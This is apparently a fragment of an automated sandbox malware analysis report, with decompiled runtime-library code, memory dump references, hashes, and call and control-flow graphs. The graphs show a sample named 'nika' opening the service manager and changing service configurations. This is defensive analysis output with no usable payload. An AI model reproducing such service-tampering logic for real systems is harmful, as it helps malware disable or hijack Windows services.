                                                                        					return 0;
                                                                        				} else {
                                                                        					if( *_t72 != 0) {
                                                                        						E0040EC86( &_v20, _a16);
                                                                        						_t43 = _v20;
                                                                        						__eflags =  *(_t43 + 0x14);
                                                                        						if( *(_t43 + 0x14) != 0) {
                                                                        							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
                                                                        							__eflags = _t46;
                                                                        							if(_t46 == 0) {
                                                                        								__eflags = _a4;
                                                                        								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                                        								if(__eflags != 0) {
                                                                        									L10:
                                                                        									__eflags = _v8;
                                                                        									if(_v8 != 0) {
                                                                        										_t53 = _v12;
                                                                        										_t11 = _t53 + 0x70;
                                                                        										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                        										__eflags =  *_t11;
                                                                        									}
                                                                        									return 1;
                                                                        								}
                                                                        								L21:
                                                                        								_t54 = E0040BFC1(__eflags);
                                                                        								 *_t54 = 0x2a;
                                                                        								__eflags = _v8;
                                                                        								if(_v8 != 0) {
                                                                        									_t54 = _v12;
                                                                        									_t33 = _t54 + 0x70;
                                                                        									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                        									__eflags =  *_t33;
                                                                        								}
                                                                        								return _t54 | 0xffffffff;
                                                                        							}
                                                                        							_t56 = _v20;
                                                                        							_t65 =  *(_t56 + 0xac);
                                                                        							__eflags = _t65 - 1;
                                                                        							if(_t65 <= 1) {
                                                                        								L17:
                                                                        								__eflags = _a12 -  *(_t56 + 0xac);
                                                                        								if(__eflags < 0) {
                                                                        									goto L21;
                                                                        								}
                                                                        								__eflags = _t72[1];
                                                                        								if(__eflags == 0) {
                                                                        									goto L21;
                                                                        								}
                                                                        								L19:
                                                                        								_t57 =  *(_t56 + 0xac);
                                                                        								__eflags = _v8;
                                                                        								if(_v8 == 0) {
                                                                        									return _t57;
                                                                        								}
                                                                        								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                        								return _t57;
                                                                        							}
                                                                        							__eflags = _a12 - _t65;
                                                                        							if(_a12 < _t65) {
                                                                        								goto L17;
                                                                        							}
                                                                        							__eflags = _a4;
                                                                        							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                        							__eflags = _t58;
                                                                        							_t56 = _v20;
                                                                        							if(_t58 != 0) {
                                                                        								goto L19;
                                                                        							}
                                                                        							goto L17;
                                                                        						}
                                                                        						_t59 = _a4;
                                                                        						__eflags = _t59;
                                                                        						if(_t59 != 0) {
                                                                        							 *_t59 =  *_t72 & 0x000000ff;
                                                                        						}
                                                                        						goto L10;
                                                                        					} else {
                                                                        						_t60 = _a4;
                                                                        						if(_t60 != 0) {
                                                                        							 *_t60 = 0;
                                                                        						}
                                                                        						goto L5;
                                                                        					}
                                                                        				}
                                                                        			}

















                                                                        0x004152a9
                                                                        0x004152b0
                                                                        0x004152c7
                                                                        0x00000000
                                                                        0x004152b7
                                                                        0x004152b9
                                                                        0x004152d3
                                                                        0x004152d8
                                                                        0x004152db
                                                                        0x004152de
                                                                        0x00415307
                                                                        0x0041530e
                                                                        0x00415310
                                                                        0x00415391
                                                                        0x004153ac
                                                                        0x004153ae
                                                                        0x004152ee
                                                                        0x004152ee
                                                                        0x004152f1
                                                                        0x004152f3
                                                                        0x004152f6
                                                                        0x004152f6
                                                                        0x004152f6
                                                                        0x004152f6
                                                                        0x00000000
                                                                        0x004152fc
                                                                        0x00415370
                                                                        0x00415370
                                                                        0x00415375
                                                                        0x0041537b
                                                                        0x0041537e
                                                                        0x00415380
                                                                        0x00415383
                                                                        0x00415383
                                                                        0x00415383
                                                                        0x00415383
                                                                        0x00000000
                                                                        0x00415387
                                                                        0x00415312
                                                                        0x00415315
                                                                        0x0041531b
                                                                        0x0041531e
                                                                        0x00415345
                                                                        0x00415348
                                                                        0x0041534e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00415350
                                                                        0x00415353
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00415355
                                                                        0x00415355
                                                                        0x0041535b
                                                                        0x0041535e
                                                                        0x004152cc
                                                                        0x004152cc
                                                                        0x00415367
                                                                        0x00000000
                                                                        0x00415367
                                                                        0x00415320
                                                                        0x00415323
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00415327
                                                                        0x00415338
                                                                        0x0041533e
                                                                        0x00415340
                                                                        0x00415343
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00415343
                                                                        0x004152e0
                                                                        0x004152e3
                                                                        0x004152e5
                                                                        0x004152eb
                                                                        0x004152eb
                                                                        0x00000000
                                                                        0x004152bb
                                                                        0x004152bb
                                                                        0x004152c0
                                                                        0x004152c4
                                                                        0x004152c4
                                                                        0x00000000
                                                                        0x004152c0
                                                                        0x004152b9

                                                                        APIs
                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                        • __isleadbyte_l.LIBCMT ref: 00415307
                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                        • String ID:
                                                                        • API String ID: 3058430110-0
                                                                        • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                        • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                        • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                        • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                        				intOrPtr _t25;
                                                                        				void* _t26;
                                                                        				void* _t28;
                                                                        
                                                                        				_t25 = _a16;
                                                                        				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                        					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                        					goto L9;
                                                                        				} else {
                                                                        					_t34 = _t25 - 0x66;
                                                                        					if(_t25 != 0x66) {
                                                                        						__eflags = _t25 - 0x61;
                                                                        						if(_t25 == 0x61) {
                                                                        							L7:
                                                                        							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                        						} else {
                                                                        							__eflags = _t25 - 0x41;
                                                                        							if(__eflags == 0) {
                                                                        								goto L7;
                                                                        							} else {
                                                                        								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                        							}
                                                                        						}
                                                                        						L9:
                                                                        						return _t26;
                                                                        					} else {
                                                                        						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                                                                        					}
                                                                        				}
                                                                        			}






                                                                        0x004134e0
                                                                        0x004134e6
                                                                        0x00413559
                                                                        0x00000000
                                                                        0x004134ed
                                                                        0x004134ed
                                                                        0x004134f0
                                                                        0x0041350b
                                                                        0x0041350e
                                                                        0x0041352e
                                                                        0x00413540
                                                                        0x00413510
                                                                        0x00413510
                                                                        0x00413513
                                                                        0x00000000
                                                                        0x00413515
                                                                        0x00413527
                                                                        0x00413527
                                                                        0x00413513
                                                                        0x0041355e
                                                                        0x00413562
                                                                        0x004134f2
                                                                        0x0041350a
                                                                        0x0041350a
                                                                        0x004134f0

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                        • String ID:
                                                                        • API String ID: 3016257755-0
                                                                        • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                        • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                        • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                        • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:31.8%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:25
                                                                        Total number of Limit Nodes:0

                                                                        Callgraph

                                                                        • Executed
                                                                        • Not Executed
                                                                        • Opacity -> Relevance
                                                                        • Disassembly available
                                                                        callgraph 0 Function_00007FFDC2EB0158 1 Function_00007FFDC2EB01D2 2 Function_00007FFDC2EB00D2 3 Function_00007FFDC2EB0148 4 Function_00007FFDC2EB01C8 5 Function_00007FFDC2EB0B4C 40 Function_00007FFDC2EB0E02 5->40 6 Function_00007FFDC2EB10CC 7 Function_00007FFDC2EB2049 8 Function_00007FFDC2EB06CA 9 Function_00007FFDC2EB0042 10 Function_00007FFDC2EB00C2 11 Function_00007FFDC2EB01C2 12 Function_00007FFDC2EB0038 13 Function_00007FFDC2EB0138 14 Function_00007FFDC2EB01B8 15 Function_00007FFDC2EB0ABC 15->0 15->3 30 Function_00007FFDC2EB0118 15->30 50 Function_00007FFDC2EB0168 15->50 16 Function_00007FFDC2EB1A3C 16->7 17 Function_00007FFDC2EB223A 18 Function_00007FFDC2EB0A2E 19 Function_00007FFDC2EB0132 22 Function_00007FFDC2EB0128 19->22 19->30 35 Function_00007FFDC2EB0108 19->35 20 Function_00007FFDC2EB00B2 21 Function_00007FFDC2EB01B2 23 Function_00007FFDC2EB01A8 24 Function_00007FFDC2EB102C 25 Function_00007FFDC2EB192C 25->0 25->3 25->30 26 Function_00007FFDC2EB071E 26->13 27 Function_00007FFDC2EB0122 28 Function_00007FFDC2EB00A2 29 Function_00007FFDC2EB01A2 31 Function_00007FFDC2EB0198 32 Function_00007FFDC2EB0112 33 Function_00007FFDC2EB0092 34 Function_00007FFDC2EB0192 34->7 36 Function_00007FFDC2EB0788 36->18 37 Function_00007FFDC2EB1188 37->22 37->30 37->35 38 Function_00007FFDC2EB000C 39 Function_00007FFDC2EB168C 41 Function_00007FFDC2EB0102 42 Function_00007FFDC2EB0182 42->7 43 Function_00007FFDC2EB0082 44 Function_00007FFDC2EB217C 44->17 45 Function_00007FFDC2EB047C 45->4 45->14 45->23 45->31 49 Function_00007FFDC2EB01E8 45->49 46 Function_00007FFDC2EB177C 46->22 46->30 46->35 47 Function_00007FFDC2EB2273 48 Function_00007FFDC2EB00F2 51 Function_00007FFDC2EB00E2 52 Function_00007FFDC2EB01E2 52->0 52->3 52->30 53 Function_00007FFDC2EB0162 53->40

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 7ffdc2eb0182-7ffdc2eb1a90 3 7ffdc2eb1a98-7ffdc2eb1ad9 ControlService 0->3 4 7ffdc2eb1adb 3->4 5 7ffdc2eb1ae1-7ffdc2eb1b17 3->5 4->5 6 7ffdc2eb1b19-7ffdc2eb1b21 5->6 7 7ffdc2eb1b22-7ffdc2eb1bd8 5->7 6->7 11 7ffdc2eb1c36-7ffdc2eb1c68 7->11 12 7ffdc2eb1bda-7ffdc2eb1be9 7->12 19 7ffdc2eb1cc7-7ffdc2eb1d00 11->19 20 7ffdc2eb1c6a-7ffdc2eb1c7a 11->20 12->11 13 7ffdc2eb1beb-7ffdc2eb1bee 12->13 14 7ffdc2eb1c28-7ffdc2eb1c30 13->14 15 7ffdc2eb1bf0-7ffdc2eb1c03 13->15 14->11 17 7ffdc2eb1c07-7ffdc2eb1c1a 15->17 18 7ffdc2eb1c05 15->18 17->17 21 7ffdc2eb1c1c-7ffdc2eb1c24 17->21 18->17 26 7ffdc2eb1d5e-7ffdc2eb1d97 19->26 27 7ffdc2eb1d02-7ffdc2eb1d11 19->27 20->19 22 7ffdc2eb1c7c-7ffdc2eb1c7f 20->22 21->14 24 7ffdc2eb1cb9-7ffdc2eb1cc1 22->24 25 7ffdc2eb1c81-7ffdc2eb1c94 22->25 24->19 28 7ffdc2eb1c98-7ffdc2eb1cab 25->28 29 7ffdc2eb1c96 25->29 35 7ffdc2eb1df6-7ffdc2eb1e2f 26->35 36 7ffdc2eb1d99-7ffdc2eb1da9 26->36 27->26 31 7ffdc2eb1d13-7ffdc2eb1d16 27->31 28->28 30 7ffdc2eb1cad-7ffdc2eb1cb5 28->30 29->28 30->24 32 7ffdc2eb1d18-7ffdc2eb1d2b 31->32 33 7ffdc2eb1d50-7ffdc2eb1d58 31->33 37 7ffdc2eb1d2f-7ffdc2eb1d42 32->37 38 7ffdc2eb1d2d 32->38 33->26 46 7ffdc2eb1e8e-7ffdc2eb1ec7 35->46 47 7ffdc2eb1e31-7ffdc2eb1e41 35->47 36->35 39 7ffdc2eb1dab-7ffdc2eb1dae 36->39 37->37 40 7ffdc2eb1d44-7ffdc2eb1d4c 37->40 38->37 41 7ffdc2eb1de8-7ffdc2eb1df0 39->41 42 7ffdc2eb1db0-7ffdc2eb1dc3 39->42 40->33 41->35 44 7ffdc2eb1dc7-7ffdc2eb1dda 42->44 45 7ffdc2eb1dc5 42->45 44->44 48 7ffdc2eb1ddc-7ffdc2eb1de4 44->48 45->44 53 7ffdc2eb1f26-7ffdc2eb1f30 46->53 54 7ffdc2eb1ec9-7ffdc2eb1ed9 46->54 47->46 49 7ffdc2eb1e43-7ffdc2eb1e46 47->49 48->41 51 7ffdc2eb1e48-7ffdc2eb1e5b 49->51 52 7ffdc2eb1e80-7ffdc2eb1e88 49->52 55 7ffdc2eb1e5f-7ffdc2eb1e72 51->55 56 7ffdc2eb1e5d 51->56 52->46 61 7ffdc2eb1f3a-7ffdc2eb1fe2 ChangeServiceConfigA 53->61 54->53 57 7ffdc2eb1edb-7ffdc2eb1ede 54->57 55->55 58 7ffdc2eb1e74-7ffdc2eb1e7c 55->58 56->55 59 7ffdc2eb1f18-7ffdc2eb1f20 57->59 60 7ffdc2eb1ee0-7ffdc2eb1ef3 57->60 58->52 59->53 62 7ffdc2eb1ef7-7ffdc2eb1f0a 60->62 63 7ffdc2eb1ef5 60->63 64 7ffdc2eb1fea-7ffdc2eb202d call 7ffdc2eb2049 61->64 65 7ffdc2eb1fe4 61->65 62->62 67 7ffdc2eb1f0c-7ffdc2eb1f14 62->67 63->62 69 7ffdc2eb202f 64->69 70 7ffdc2eb2034-7ffdc2eb2047 64->70 65->64 67->59 69->70
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.393933198.00007FFDC2EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC2EB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_7ffdc2eb0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: Service$ChangeConfigControl
                                                                        • String ID:
                                                                        • API String ID: 1778205439-0
                                                                        • Opcode ID: 453a6d13ce2e9233cb4bcaf714cf6e9be1dbe184984aae6c00e23145ac576d60
                                                                        • Instruction ID: af0a15e73bd54823b2b7ed48a40b9a8b4033cbeed52ba271f910e896d8520d31
                                                                        • Opcode Fuzzy Hash: 453a6d13ce2e9233cb4bcaf714cf6e9be1dbe184984aae6c00e23145ac576d60
                                                                        • Instruction Fuzzy Hash: E812A230A18A4D4FEB68DF2CDC567F977D0FB58311F10426EE84EC7291DA75A5818B82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 71 7ffdc2eb1a3c-7ffdc2eb1ad9 ControlService 75 7ffdc2eb1adb 71->75 76 7ffdc2eb1ae1-7ffdc2eb1b17 71->76 75->76 77 7ffdc2eb1b19-7ffdc2eb1b21 76->77 78 7ffdc2eb1b22-7ffdc2eb1bd8 76->78 77->78 82 7ffdc2eb1c36-7ffdc2eb1c68 78->82 83 7ffdc2eb1bda-7ffdc2eb1be9 78->83 90 7ffdc2eb1cc7-7ffdc2eb1d00 82->90 91 7ffdc2eb1c6a-7ffdc2eb1c7a 82->91 83->82 84 7ffdc2eb1beb-7ffdc2eb1bee 83->84 85 7ffdc2eb1c28-7ffdc2eb1c30 84->85 86 7ffdc2eb1bf0-7ffdc2eb1c03 84->86 85->82 88 7ffdc2eb1c07-7ffdc2eb1c1a 86->88 89 7ffdc2eb1c05 86->89 88->88 92 7ffdc2eb1c1c-7ffdc2eb1c24 88->92 89->88 97 7ffdc2eb1d5e-7ffdc2eb1d97 90->97 98 7ffdc2eb1d02-7ffdc2eb1d11 90->98 91->90 93 7ffdc2eb1c7c-7ffdc2eb1c7f 91->93 92->85 95 7ffdc2eb1cb9-7ffdc2eb1cc1 93->95 96 7ffdc2eb1c81-7ffdc2eb1c94 93->96 95->90 99 7ffdc2eb1c98-7ffdc2eb1cab 96->99 100 7ffdc2eb1c96 96->100 106 7ffdc2eb1df6-7ffdc2eb1e2f 97->106 107 7ffdc2eb1d99-7ffdc2eb1da9 97->107 98->97 102 7ffdc2eb1d13-7ffdc2eb1d16 98->102 99->99 101 7ffdc2eb1cad-7ffdc2eb1cb5 99->101 100->99 101->95 103 7ffdc2eb1d18-7ffdc2eb1d2b 102->103 104 7ffdc2eb1d50-7ffdc2eb1d58 102->104 108 7ffdc2eb1d2f-7ffdc2eb1d42 103->108 109 7ffdc2eb1d2d 103->109 104->97 117 7ffdc2eb1e8e-7ffdc2eb1ec7 106->117 118 7ffdc2eb1e31-7ffdc2eb1e41 106->118 107->106 110 7ffdc2eb1dab-7ffdc2eb1dae 107->110 108->108 111 7ffdc2eb1d44-7ffdc2eb1d4c 108->111 109->108 112 7ffdc2eb1de8-7ffdc2eb1df0 110->112 113 7ffdc2eb1db0-7ffdc2eb1dc3 110->113 111->104 112->106 115 7ffdc2eb1dc7-7ffdc2eb1dda 113->115 116 7ffdc2eb1dc5 113->116 115->115 119 7ffdc2eb1ddc-7ffdc2eb1de4 115->119 116->115 124 7ffdc2eb1f26-7ffdc2eb1fe2 ChangeServiceConfigA 117->124 125 7ffdc2eb1ec9-7ffdc2eb1ed9 117->125 118->117 120 7ffdc2eb1e43-7ffdc2eb1e46 118->120 119->112 122 7ffdc2eb1e48-7ffdc2eb1e5b 120->122 123 7ffdc2eb1e80-7ffdc2eb1e88 120->123 126 7ffdc2eb1e5f-7ffdc2eb1e72 122->126 127 7ffdc2eb1e5d 122->127 123->117 135 7ffdc2eb1fea-7ffdc2eb1ffc call 7ffdc2eb2049 124->135 136 7ffdc2eb1fe4 124->136 125->124 128 7ffdc2eb1edb-7ffdc2eb1ede 125->128 126->126 129 7ffdc2eb1e74-7ffdc2eb1e7c 126->129 127->126 130 7ffdc2eb1f18-7ffdc2eb1f20 128->130 131 7ffdc2eb1ee0-7ffdc2eb1ef3 128->131 129->123 130->124 133 7ffdc2eb1ef7-7ffdc2eb1f0a 131->133 134 7ffdc2eb1ef5 131->134 133->133 138 7ffdc2eb1f0c-7ffdc2eb1f14 133->138 134->133 139 7ffdc2eb2001-7ffdc2eb202d 135->139 136->135 138->130 140 7ffdc2eb202f 139->140 141 7ffdc2eb2034-7ffdc2eb2047 139->141 140->141
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.393933198.00007FFDC2EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC2EB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_7ffdc2eb0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: Service$ChangeConfigControl
                                                                        • String ID:
                                                                        • API String ID: 1778205439-0
                                                                        • Opcode ID: 4fc1805c74cf3c8e697d6d849a96eff937959df1936bbadebca52d8a5b0337b7
                                                                        • Instruction ID: 3e077b4685b4910094fd7d2adb799c403f09252d6b049785d485f2591ef3e0a2
                                                                        • Opcode Fuzzy Hash: 4fc1805c74cf3c8e697d6d849a96eff937959df1936bbadebca52d8a5b0337b7
                                                                        • Instruction Fuzzy Hash: 4D12A230A18A4D4FEB68DF2CDC567F977D0FB58311F10426EE84EC7291DA75A9818B82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 142 7ffdc2eb0b4c-7ffdc2eb0bb8 146 7ffdc2eb0bba-7ffdc2eb0bbf 142->146 147 7ffdc2eb0bc2-7ffdc2eb0bc7 142->147 146->147 148 7ffdc2eb0bc9-7ffdc2eb0bce 147->148 149 7ffdc2eb0bd1-7ffdc2eb0c08 OpenSCManagerW 147->149 148->149 150 7ffdc2eb0c0a 149->150 151 7ffdc2eb0c10-7ffdc2eb0c3b 149->151 150->151 152 7ffdc2eb0c46-7ffdc2eb0ce5 151->152 153 7ffdc2eb0c3d-7ffdc2eb0c45 151->153 157 7ffdc2eb0ce7-7ffdc2eb0cf6 152->157 158 7ffdc2eb0d40-7ffdc2eb0daa OpenServiceA 152->158 153->152 157->158 159 7ffdc2eb0cf8-7ffdc2eb0cfb 157->159 165 7ffdc2eb0dac 158->165 166 7ffdc2eb0db2-7ffdc2eb0de6 call 7ffdc2eb0e02 158->166 160 7ffdc2eb0d35-7ffdc2eb0d3d 159->160 161 7ffdc2eb0cfd-7ffdc2eb0d10 159->161 160->158 163 7ffdc2eb0d14-7ffdc2eb0d27 161->163 164 7ffdc2eb0d12 161->164 163->163 167 7ffdc2eb0d29-7ffdc2eb0d31 163->167 164->163 165->166 170 7ffdc2eb0de8 166->170 171 7ffdc2eb0ded-7ffdc2eb0e01 166->171 167->160 170->171
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.393933198.00007FFDC2EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC2EB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_7ffdc2eb0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: Open$ManagerService
                                                                        • String ID:
                                                                        • API String ID: 2351955762-0
                                                                        • Opcode ID: e7d33875a8d63c7287acc8c0c36493c3ec10362a497c35d857f0ed22203a75c4
                                                                        • Instruction ID: f6462c64d29c846edbf7a97c385473c8b6a235589b8649794ee5728a46024ea4
                                                                        • Opcode Fuzzy Hash: e7d33875a8d63c7287acc8c0c36493c3ec10362a497c35d857f0ed22203a75c4
                                                                        • Instruction Fuzzy Hash: 4EA1B030908A4C8FEB68EF68DC567F97BE1FB59311F00412EE44ED3292DE75A8458B85
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 181 7ffdc2eb0192-7ffdc2eb1bd8 185 7ffdc2eb1c36-7ffdc2eb1c68 181->185 186 7ffdc2eb1bda-7ffdc2eb1be9 181->186 193 7ffdc2eb1cc7-7ffdc2eb1d00 185->193 194 7ffdc2eb1c6a-7ffdc2eb1c7a 185->194 186->185 187 7ffdc2eb1beb-7ffdc2eb1bee 186->187 188 7ffdc2eb1c28-7ffdc2eb1c30 187->188 189 7ffdc2eb1bf0-7ffdc2eb1c03 187->189 188->185 191 7ffdc2eb1c07-7ffdc2eb1c1a 189->191 192 7ffdc2eb1c05 189->192 191->191 195 7ffdc2eb1c1c-7ffdc2eb1c24 191->195 192->191 200 7ffdc2eb1d5e-7ffdc2eb1d97 193->200 201 7ffdc2eb1d02-7ffdc2eb1d11 193->201 194->193 196 7ffdc2eb1c7c-7ffdc2eb1c7f 194->196 195->188 198 7ffdc2eb1cb9-7ffdc2eb1cc1 196->198 199 7ffdc2eb1c81-7ffdc2eb1c94 196->199 198->193 202 7ffdc2eb1c98-7ffdc2eb1cab 199->202 203 7ffdc2eb1c96 199->203 209 7ffdc2eb1df6-7ffdc2eb1e2f 200->209 210 7ffdc2eb1d99-7ffdc2eb1da9 200->210 201->200 205 7ffdc2eb1d13-7ffdc2eb1d16 201->205 202->202 204 7ffdc2eb1cad-7ffdc2eb1cb5 202->204 203->202 204->198 206 7ffdc2eb1d18-7ffdc2eb1d2b 205->206 207 7ffdc2eb1d50-7ffdc2eb1d58 205->207 211 7ffdc2eb1d2f-7ffdc2eb1d42 206->211 212 7ffdc2eb1d2d 206->212 207->200 220 7ffdc2eb1e8e-7ffdc2eb1ec7 209->220 221 7ffdc2eb1e31-7ffdc2eb1e41 209->221 210->209 213 7ffdc2eb1dab-7ffdc2eb1dae 210->213 211->211 214 7ffdc2eb1d44-7ffdc2eb1d4c 211->214 212->211 215 7ffdc2eb1de8-7ffdc2eb1df0 213->215 216 7ffdc2eb1db0-7ffdc2eb1dc3 213->216 214->207 215->209 218 7ffdc2eb1dc7-7ffdc2eb1dda 216->218 219 7ffdc2eb1dc5 216->219 218->218 222 7ffdc2eb1ddc-7ffdc2eb1de4 218->222 219->218 227 7ffdc2eb1f26-7ffdc2eb1f30 220->227 228 7ffdc2eb1ec9-7ffdc2eb1ed9 220->228 221->220 223 7ffdc2eb1e43-7ffdc2eb1e46 221->223 222->215 225 7ffdc2eb1e48-7ffdc2eb1e5b 223->225 226 7ffdc2eb1e80-7ffdc2eb1e88 223->226 229 7ffdc2eb1e5f-7ffdc2eb1e72 225->229 230 7ffdc2eb1e5d 225->230 226->220 235 7ffdc2eb1f3a-7ffdc2eb1fe2 ChangeServiceConfigA 227->235 228->227 231 7ffdc2eb1edb-7ffdc2eb1ede 228->231 229->229 232 7ffdc2eb1e74-7ffdc2eb1e7c 229->232 230->229 233 7ffdc2eb1f18-7ffdc2eb1f20 231->233 234 7ffdc2eb1ee0-7ffdc2eb1ef3 231->234 232->226 233->227 236 7ffdc2eb1ef7-7ffdc2eb1f0a 234->236 237 7ffdc2eb1ef5 234->237 238 7ffdc2eb1fea-7ffdc2eb202d call 7ffdc2eb2049 235->238 239 7ffdc2eb1fe4 235->239 236->236 241 7ffdc2eb1f0c-7ffdc2eb1f14 236->241 237->236 243 7ffdc2eb202f 238->243 244 7ffdc2eb2034-7ffdc2eb2047 238->244 239->238 241->233 243->244
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.393933198.00007FFDC2EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC2EB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_7ffdc2eb0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeConfigService
                                                                        • String ID:
                                                                        • API String ID: 3849694230-0
                                                                        • Opcode ID: 198aba9ddb11a97f3dd07a2682cf2eab96d5d68bdf3199b6aa90596190c77c9f
                                                                        • Instruction ID: 68f184211af7f19bac9c7cee3ccf6a5a243c78b39b0dbedf5017e2cccfbd4154
                                                                        • Opcode Fuzzy Hash: 198aba9ddb11a97f3dd07a2682cf2eab96d5d68bdf3199b6aa90596190c77c9f
                                                                        • Instruction Fuzzy Hash: E3F19130A18A4D4FEB68DE2CDC567F977D0FB58311F10426EE84EC7291DAB5A5818BC2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.393933198.00007FFDC2EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC2EB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_7ffdc2eb0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: NameUser
                                                                        • String ID:
                                                                        • API String ID: 2645101109-0
                                                                        • Opcode ID: 366e3c0db6644f9a59a63b6c8e3f03c36e57a0aa3fc076e6a23fd3e5c869672e
                                                                        • Instruction ID: 83373483f94253e9264abb20d5132d2bea2cb9165c85edb38f399886146d59b0
                                                                        • Opcode Fuzzy Hash: 366e3c0db6644f9a59a63b6c8e3f03c36e57a0aa3fc076e6a23fd3e5c869672e
                                                                        • Instruction Fuzzy Hash: D7916D30A08A4D8FEB68EF28C8557E977A1FF59311F00417EE84EC7291DF75A9818B81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
